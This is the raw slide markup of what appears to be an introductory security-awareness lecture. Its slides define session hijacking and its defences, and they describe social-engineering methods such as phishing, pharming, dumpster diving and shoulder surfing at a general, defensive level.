        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are two main types of session hijacking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Active</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An attacker finds an active session and takes over</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Passive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An attacker hijacks a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sits back, and watches and records all the traffic that is being sent forth</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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3002885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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="4993409"/>
            <a:ext cx="4876800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="1" kern="1200" cap="none" baseline="0">
                <a:ln w="500">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FAF7C8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FAF7C8"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:hlinkClick r:id="rId2"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538288" y="1142911"/>
            <a:ext cx="6067425" cy="3705225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163646051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a:t>Protecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a secure protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit incoming connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimize remote access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Educate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>employees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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266"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6781800" y="4419600"/>
            <a:ext cx="1646101" cy="1897319"/>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311208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Golden Rule 7.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provide Constant Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5385670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check authentication data constantly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> user or an application might have once passed a security check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>That does not mean they should be trusted blindly from that moment on</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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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172200" y="4343400"/>
            <a:ext cx="2012577" cy="2109070"/>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6372" y="5257800"/>
            <a:ext cx="2272281" cy="1476375"/>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930757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Social Engineering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is social engineering?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The act of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>manipulating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>people</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> into performing actions or revealing confidential information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instead of breaking in or using technical hacking techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Essentially – a fancier, more technical way of lying</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109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290"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867400" y="5029200"/>
            <a:ext cx="1905000" cy="1190625"/>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36917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Reasons for Failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>world, software failures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>usually happen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>spontaneously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ithout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>intentional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mischief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Failures can be result of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Challenge/Prestige</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Curiosity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> driven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Aiming to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>andalizing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealing</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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096000" y="4724400"/>
            <a:ext cx="2138756" cy="159385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163365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Popular Social Engineering Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"Dumpster Diving"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"Shoulder Surfing"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious E-mail Attachments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eception and Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"Phishing"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"Pharming"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>everse Social Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PBX Disguise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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290"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6065822" y="3409202"/>
            <a:ext cx="2584107" cy="2885902"/>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21365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Phishing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="990600"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>communication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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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648201" y="3621430"/>
            <a:ext cx="3810000" cy="2971614"/>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70269" y="3611803"/>
            <a:ext cx="3749149" cy="3004717"/>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4494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Malicious E-mail Attachments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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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39839" y="2133600"/>
            <a:ext cx="8019854" cy="3124200"/>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31894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Pharming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pharming is a hacker's attack aiming to redirect a website's traffic to another, bogus website.</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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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514600" y="2590800"/>
            <a:ext cx="5905500" cy="3905250"/>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59976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“Dumpster Diving”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"Dumpster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diving“, a.k.a. trashing or skipping, is the practice of sifting through commercial or residential trash to find items that have been discarded by their owners, but which may be useful to the dumpster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>diver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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953000" y="3695700"/>
            <a:ext cx="3657600" cy="2743200"/>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73269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Deception and Manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real story: Japan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Earthquake </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scammers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>were spreading malicious links to “dramatic” videos of the disaster. So, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ended up clicking on a link that actually downloaded malware onto your PC or took you to a phishing site that asked for personal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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372100" y="4317880"/>
            <a:ext cx="2879436" cy="2349620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9067"/>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6687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“Shoulder Surfing”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These are direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>observation techniques, such as looking over someone's shoulder, to get information. Shoulder surfing is particularly effective in crowded places because it is relatively easy to observe someone as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>they:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fill </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>out a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>enter their password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tell sensitive information over the phone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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098"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400800" y="3733800"/>
            <a:ext cx="2388384" cy="1793383"/>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24762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PBX Disguise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Public Business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exchange – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> attacker manipulates company ID system to impersonate someone of authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218"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96832" l="4200" r="90000">
                        <a14:foregroundMark x1="25600" y1="20198" x2="25600" y2="20198"/>
                        <a14:foregroundMark x1="20400" y1="6931" x2="20400" y2="6931"/>
                        <a14:foregroundMark x1="47600" y1="30693" x2="47600" y2="30693"/>
                        <a14:foregroundMark x1="38800" y1="45347" x2="38800" y2="45347"/>
                        <a14:foregroundMark x1="22400" y1="33267" x2="22400" y2="33267"/>
                        <a14:foregroundMark x1="34600" y1="32277" x2="34600" y2="32277"/>
                        <a14:foregroundMark x1="28600" y1="60198" x2="28600" y2="60198"/>
                        <a14:foregroundMark x1="75800" y1="33267" x2="75800" y2="33267"/>
                        <a14:foregroundMark x1="50000" y1="26733" x2="50000" y2="26733"/>
                        <a14:foregroundMark x1="37800" y1="23762" x2="37800" y2="23762"/>
                        <a14:foregroundMark x1="25400" y1="25743" x2="25400" y2="25743"/>
                        <a14:foregroundMark x1="47000" y1="40000" x2="47000" y2="40000"/>
                        <a14:foregroundMark x1="39800" y1="39802" x2="39800" y2="39802"/>
                        <a14:foregroundMark x1="13600" y1="30297" x2="13600" y2="30297"/>
                        <a14:foregroundMark x1="68400" y1="45941" x2="68400" y2="45941"/>
                        <a14:foregroundMark x1="53000" y1="46535" x2="53000" y2="46535"/>
                        <a14:foregroundMark x1="52600" y1="46535" x2="52600" y2="46535"/>
                        <a14:foregroundMark x1="56600" y1="33465" x2="56600" y2="33465"/>
                        <a14:foregroundMark x1="39200" y1="31287" x2="39200" y2="31287"/>
                        <a14:foregroundMark x1="20800" y1="26733" x2="20800" y2="26733"/>
                        <a14:foregroundMark x1="26000" y1="31683" x2="26000" y2="31683"/>
                        <a14:foregroundMark x1="32000" y1="30693" x2="32000" y2="30693"/>
                        <a14:foregroundMark x1="59200" y1="22772" x2="59200" y2="22772"/>
                        <a14:foregroundMark x1="32000" y1="24554" x2="32000" y2="24554"/>
                        <a14:foregroundMark x1="19200" y1="23762" x2="19200" y2="23762"/>
                        <a14:foregroundMark x1="17400" y1="33861" x2="17400" y2="33861"/>
                        <a14:foregroundMark x1="17400" y1="33861" x2="17400" y2="33861"/>
                        <a14:foregroundMark x1="17400" y1="30693" x2="17400" y2="30693"/>
                        <a14:foregroundMark x1="22400" y1="30891" x2="22400" y2="30891"/>
